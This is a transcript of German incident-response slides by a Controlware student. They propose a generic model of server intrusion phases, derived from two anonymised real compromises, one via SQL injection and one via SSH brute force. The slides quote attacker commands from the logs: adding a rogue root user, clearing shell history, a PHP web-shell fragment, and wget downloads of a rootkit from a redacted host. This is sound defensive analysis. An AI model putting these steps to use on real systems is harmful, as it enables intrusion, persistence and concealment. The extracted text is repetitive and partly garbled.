Generischer Ablauf von Serversystemeinbrüchen Analyse und Konzeption

Transkript

1 State-of-the-art Technology for Worldwide Telecommunications Generischer Ablauf von Serversystemeinbrüchen Analyse und Konzeption Denise Muth Hamburg, 0. Februar 03

2 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite

3 Motivation Trotz vielfältiger Sicherheitsmechanismen können Serversystemeinbrüche im Unternehmenskontext nicht immer verhindert werden. 0 war zweifelsohne das 'Jahr des Hackers'. (RSA, Cybercrime Trends Report 0) Viele der im Unternehmenskontext auftretenden Sicherheitsvorfälle sind auf einbrüche zurückzuführen * ) Bekannte einbrüche: Raumfahrtbehörde NASA, Elektronikkonzern Sony, Rüstungskonzern Lockheed Martin Potentielle Einstiegspunkte in IT-Infrastrukturen stellen Serversysteme mit öffentlicher Netzanbindung dar Überwiegende Ausführung von einbrüchen im Unternehmenskontext durch externe Angreifer * ) * ) Verizon Data Breach Investigations Report, RSA Cybercrime Trends Report, BSI Lagebericht, BSI Register aktueller Cyber-Gefährdungen und -Angriffsformen u.w I Controlware GmbH I Seite 3

4 Motivation Für die Behandlung von Serversystemeinbrüche im Incident Response sind vor allem die Angriffsphasen nach dem erfolgreichen Eindringen entscheidend. Incident Response zur reaktiven Behandlung potentieller Sicherheitsvorfälle wie Serversystemeinbrüche (vgl. DFN-CERT): einbruch Vorbereitung Angriffsphase Pre- ation Nachbereitung Erkennung Angriffsphase Incident Response... Angriffsphase n Kontrollübernahme Post- ation Analyse Eindämmung Behandlungsprozess des Incident Response erfordert tiefergehendes Verständnis über den Ablauf von einbrüchen Einsatz Penetrationstest-Modell? I Controlware GmbH I Seite 4

5 Motivation Für die Behandlung von Serversystemeinbrüche im Incident Response sind vor allem die Angriffsphasen nach dem erfolgreichen Eindringen entscheidend. Incident Response zur reaktiven Behandlung potentieller Sicherheitsvorfälle wie Serversystemeinbrüche (vgl. DFN-CERT): einbruch Vorbereitung Angriffsphase Pre- ation Nachbereitung Erkennung Angriffsphase Incident Response... Angriffsphase n Kontrollübernahme Post- ation Analyse Eindämmung Behandlungsprozess des Incident Response erfordert tiefergehendes Verständnis über den Ablauf von einbrüchen Einsatz Penetrationstest-Modell? I Controlware GmbH I Seite 4

6 Motivation Ein generisches Modell, das speziell Angriffsphasen nach dem Eindringen berücksichtigt, soll das benötigte Wissen dem Incident Response bereitstellen. Analyse generischer Einbruchsmodelle sowie realer Servereinbrüche und Konzeption eines neuen Modells einbruch Angriffsphase Beantwortung der wissenschaftlichen Fragestellungen: Welche Angriffsphasen sollte ein generisches Modell für den Einsatz im Incident Response umfassen? Welche Übergänge sind zwischen den einzelnen Angriffsphasen notwendig? Angriffsphase... Angriffsphase n Unterstützung des Incident Respone bei der reaktiven Behandlung von Serversystemeinbrüchen Incident Response I Controlware GmbH I Seite 5

7 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite 6

8 Ergebnisse Analyse Analyse Die Entwicklung des neuen, generischen Modells für Serversystemeinbrüche untergliedert sich in die Aufgabengebiete Analyse und Konzeption. Generisches Modell einbruch Analyse Konzeption Modelle Szenarien Incident Response I Controlware GmbH I Seite 7

9 Ergebnisse Analyse: Modelle Die existierenden Einbruchsmodelle fokussieren vorwiegend Angriffsphasen zur Erkundung von en und der Erlangung des Zugangs. NIST-Modell: Discovery Gaining Access Escalating Browsing ation SANS-Modell: Initial Reconnaiss. ning Enumeration Gaining Access Privilege Escalation I Controlware GmbH I Seite 8

10 Ergebnisse Analyse: Szenarien Die Analyse der realen Serversystemeinbrüche erfolgte auf Basis protokollierter Logdaten, die in anonymisierter Form bereitgestellt wurden. cd /tmp ls man ssh-arqbskvt5 uname - uname: zusätzlicher Operand - uname --help gibt weitere Informationen. root@fileserver:/tmp# uname -a Linux fileserver generic #6-Ubuntu SMP Fri Jan 0 5:59:53 UTC 0 i686 i686 i386 GNU/Linux root@fileserver:/tmp# cd /home root@fileserver:/home# ls bert paul sven root@fileserver:/home# adduser wwf Lege Benutzer»wwf«an... Erstelle Home-Verzeichnis»/home/wwf«... Kopiere Dateien aus»/etc/skel«... Geben Sie ein neues UNIX-Passwort ein: Geben Sie das neue UNIX-Passwort erneut ein: passwd: Passwort erfolgreich geändert Benutzerinformationen für wwf werden geändert. Geben Sie einen neuen Wert an oder drücken Sie ENTER für den Standardwert Vollständiger Name []: Raumnummer []: Telefon geschäftlich []: Telefon privat []: Sonstiges []: Sind die Informationen korrekt? [J/n] J Lege neue Gruppe»wwf«(003) an... Lege neuen Benutzer»wwf«(003) mit Gruppe»wwf«an... root@fileserver:/home# nano /etc/passwd root@fileserver:/home# history -c I Controlware GmbH I Seite 9

11 Ergebnisse Analyse: Szenarien Die Analyse der realen Serversystemeinbrüche erfolgte auf Basis protokollierter Logdaten, die in anonymisierter Form bereitgestellt wurden. Angriffsaktivitäten t I Controlware GmbH I Seite 9

12 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t I Controlware GmbH I Seite 0

13 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten Durchführung von SQL Injection-Angriffen t I Controlware GmbH I Seite 0

14 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t I Controlware GmbH I Seite 0

15 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten 3 t Überprüfung des aktiven Datenbankbenutzers, des Datenbankschema etc I Controlware GmbH I Seite 0

16 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten 3 4 t <?php ($_POST[ cmd ]);?> I Controlware GmbH I Seite 0

17 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t 6 Einrichtung c_99madshell.php I Controlware GmbH I Seite 0

18 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t 6 7 Übertragung der Datenbankbenutzer I Controlware GmbH I Seite 0

19 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Einrichtung rss.php I Controlware GmbH I Seite 0

20 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Verwendung rss.php I Controlware GmbH I Seite 0

21 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Manipulation 9 regulärer Skriptdateien I Controlware GmbH I Seite 0

22 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Verwendung C_99madshell.php I Controlware GmbH I Seite 0

23 Ergebnisse Analyse: Szenarien Im Web-Szenario ereignete sich die Kompromittierung einer Web-Anwendung durch einen SQL-Injection-Angriff auf ein Skript der Internetpräsenz. Angriffsaktivitäten t Manipulation regulärer Skriptdateien I Controlware GmbH I Seite 0

24 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten I Controlware GmbH I Seite

25 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Durchführung eines Portscans I Controlware GmbH I Seite

26 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Durchführung eines Brute Force-Angriffs I Controlware GmbH I Seite

27 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten 3 Auswahl eines Zielobjekts I Controlware GmbH I Seite

28 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten 3 4 Überprüfung der Version des Betriebssystemkernels und der Verzeichnisinhalte wie /home/ und /temp/ I Controlware GmbH I Seite

29 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Einrichtung des Benutzers wwf mit Rootrechten I Controlware GmbH I Seite

30 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten history -c I Controlware GmbH I Seite

31 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten wget xxx.xx.xxx/rootkit I Controlware GmbH I Seite

32 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten /Rootkit I Controlware GmbH I Seite

33 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten Löschen der angelegten Dateien und eingegebenen Befehle I Controlware GmbH I Seite

34 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten /sbin/ifconfig ; /proc/cpuinfo I Controlware GmbH I Seite

35 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten wget xxx.xx.xxx/ner I Controlware GmbH I Seite

36 Ergebnisse Analyse: Szenarien Im SSH-Szenario ereignete sich Kompromittierung eines Fernwartungszugangs durch einen Brute Force-Angriff auf die Benutzerkonten des s. Angriffsaktivitäten /ner I Controlware GmbH I Seite

37 Ergebnisse Konzeption Konzeption Die Entwicklung des neuen, generischen Modells für Serversystemeinbrüche untergliedert sich in die Aufgabengebiete Analyse und Konzeption. Generisches Modell einbruch Analyse Konzeption Modelle Szenarien Incident Response I Controlware GmbH I Seite

38 Ergebnisse Konzeption: Pre- und Die Funktionsweise der Einbruchsmodelle wird anhand einer Zuordnung der Angriffsaktivitäten zu den entsprechenden Modellphasen untersucht. Discovery Gaining A. Escal. P. B. ation NIST ning Enumerat. Gaining A. Privil. E. Estab. B. T. SANS t I Controlware GmbH I Seite 3

39 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf t I Controlware GmbH I Seite 4

40 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. Escal. P. B. ation NIST t I Controlware GmbH I Seite 4

41 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf.??? Discovery Gaining A. Escal. P. B. ation NIST t I Controlware GmbH I Seite 4

42 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. ning Discovery Gaining A. Escal. P. B. ation NIST Enumerat. Gaining A.??? Privil. E. Estab. B. T. SANS t I Controlware GmbH I Seite 4

43 Ergebnisse Konzeption: Pre- und Die Zuordnung des Web-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf.??? Discovery Gaining A. Escal. P. B. ation NIST ning Enumerat. Gaining A. Privil. E.? Estab. B.? T.? SANS t I Controlware GmbH I Seite 4

44 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf t I Controlware GmbH I Seite 5

45 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. Escal. P. B. ation NIST t I Controlware GmbH I Seite 5

46 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. B. ation NIST Escal. P.?? t I Controlware GmbH I Seite 5

47 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. Discovery Gaining A. B. ation NIST Escal. P.?? ning Enumerat. Gaining A. Privil. E. Estab. B. T. SANS t I Controlware GmbH I Seite 5

48 Ergebnisse Konzeption: Pre- und Die Zuordnung des SSH-Szenarios zu den Modellen des NIST und des SANS weist vor allem im Bereich der Abweichungen auf. ning Discovery Gaining A. B. ation NIST Enumerat. Gaining A. Privil. E. Estab. B.? Escal. P.???? T. SANS t I Controlware GmbH I Seite 5

49 Ergebnisse Konzeption: Pre- und Ein neues Modell für das Incident Response erfordert zusätzliche sowie stärker unterteilte Angriffsphasen und flexiblere Übergänge in der. : Unterscheidung zwischen Informationssuche und Schwachstellensuche Erlangung des zugangs unter Verwendung einer Schwachstelle oder eines s : Beginnt in der Regel mit der Untersuchung des zu Grunde liegenden s Danach erhebliche Dynamik im Ablauf und folglich der Anordnung der Angriffsphasen Unterscheidung zwischen Herunterladen und ieren zusätzlicher Werkzeuge I Controlware GmbH I Seite 6

50 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt I Controlware GmbH I Seite 7

51 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Durchführung eines Portscans I Controlware GmbH I Seite 7

52 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Durchführung eines Brute Force-Angriffs I Controlware GmbH I Seite 7

53 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Auswahl eines Zielobjekts I Controlware GmbH I Seite 7

54 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Untersuchung der Verzeichnisinhalte wie /home/ und /temp/ I Controlware GmbH I Seite 7

55 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information Item wget xxx.xx.xxx/rootkit I Controlware GmbH I Seite 7

56 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information./Rootkit I Controlware GmbH I Seite 7

57 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information Anlegen des Benutzers wwf mit Rootrechten I Controlware GmbH I Seite 7

58 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information I Controlware GmbH I Seite 7

59 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information I Controlware GmbH I Seite 7

60 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Information./ner Item wget xxx.xx.xxx/ner I Controlware GmbH I Seite 7

61 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information Löschen der angelegten Dateien und eingegebenen Befehle I Controlware GmbH I Seite 7

62 Ergebnisse Konzeption: Pre- und Auf Basis der gewonnen Erkenntnisse wurde ein generisches Modell definiert, das vor allem Angriffsphasen nach dem Eindringen berücksichtigt. Item Information I Controlware GmbH I Seite 7

63 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite 8

64 Fazit & Ausblick Das generische Modell beantwortet die zentralen Fragen und unterstützt das Incident Response bei der Behandlung von Seversystemeinbrüchen. Generisches Modell einbruch Analyse Konzeption Modelle Szenarien Incident Response I Controlware GmbH I Seite 9

65 Fazit & Ausblick Das generische Modell beantwortet die zentralen Fragen und unterstützt das Incident Response bei der Behandlung von Seversystemeinbrüchen. Entscheidende Mischung aus theoretischer Fundierung und praktischer Relevanz Analyse Generisches Modell einbruch Konzeption Berücksichtigung von Angriffsphasen nicht nur vor, sondern auch nach dem Eindringen in ein Serversystem Modelle Szenarien Incident Response Pre- ation Post- ation Beantwortung der zu Beginn gestellten, zentralen Fragestellungen: Welche Angriffsphasen sollte ein generisches Modell für den Einsatz im Incident Response umfassen? Welche Übergänge sind zwischen den einzelnen Angriffsphasen notwendig? Anreicherung des neuen Modells um typische Spuren der jeweiligen Angriffsphasen Ergänzung des organisatorischen Behandlungsprozesses des Incident Response um ein technisches Einbruchsschema I Controlware GmbH I Seite 9

66 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick I Controlware GmbH I Seite 0

67 Agenda Generischer Ablauf von Serversystemeinbrüchen 3 Motivation Ergebnisse Fazit & Ausblick? FRAGEN I Controlware GmbH I Seite 0

68 State-of-the-art Technology for Worldwide Telecommunications Vielen Dank für Ihre Aufmerksamkeit! Thank you very much for your attention! Merci beaucoup pour votre attention! Gracias por su atención! Denise Muth KoSI-Studentin Controlware GmbH Waldstrasse Dietzenbach Denise.Muth@controlware.de